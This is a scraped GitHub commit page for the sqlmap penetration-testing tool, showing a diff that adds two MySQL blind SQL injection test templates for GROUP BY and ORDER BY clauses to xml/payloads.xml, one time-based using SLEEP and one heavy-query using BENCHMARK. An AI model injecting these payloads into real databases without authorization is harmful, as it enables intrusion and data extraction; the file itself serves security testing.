Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit a4f5c1d

Browse files
stamparmstamparm
committed
Merge branch 'master' of github.com:sqlmapproject/sqlmap
2 parents 08244c7 + 771e7a9 commit a4f5c1d

1 file changed

Lines changed: 43 additions & 0 deletions

File tree

xml/payloads.xml

Lines changed: 43 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -2836,6 +2836,49 @@ Formats:
28362836
<!-- End of OR time-based blind tests -->
28372837

28382838

2839+
<!-- Time-based blind tests - GROUP BY and ORDER BY clauses -->
2840+
<test>
2841+
<title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
2842+
<stype>5</stype>
2843+
<level>3</level>
2844+
<risk>2</risk>
2845+
<clause>2,3</clause>
2846+
<where>1</where>
2847+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
2848+
<request>
2849+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
2850+
</request>
2851+
<response>
2852+
<time>[DELAYED]</time>
2853+
</response>
2854+
<details>
2855+
<dbms>MySQL</dbms>
2856+
<dbms_version>&gt;= 5.0.11</dbms_version>
2857+
</details>
2858+
</test>
2859+
2860+
<test>
2861+
<title>MySQL &lt; 5.0.12 boolean-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
2862+
<stype>5</stype>
2863+
<level>4</level>
2864+
<risk>2</risk>
2865+
<clause>2,3</clause>
2866+
<where>1</where>
2867+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
2868+
<request>
2869+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
2870+
</request>
2871+
<response>
2872+
<time>[DELAYED]</time>
2873+
</response>
2874+
<details>
2875+
<dbms>MySQL</dbms>
2876+
</details>
2877+
</test>
2878+
<!-- TODO: add tests for other DBMSes -->
2879+
<!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
2880+
2881+
28392882
<!-- UNION query tests -->
28402883
<test>
28412884
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>

0 commit comments

Comments
 (0)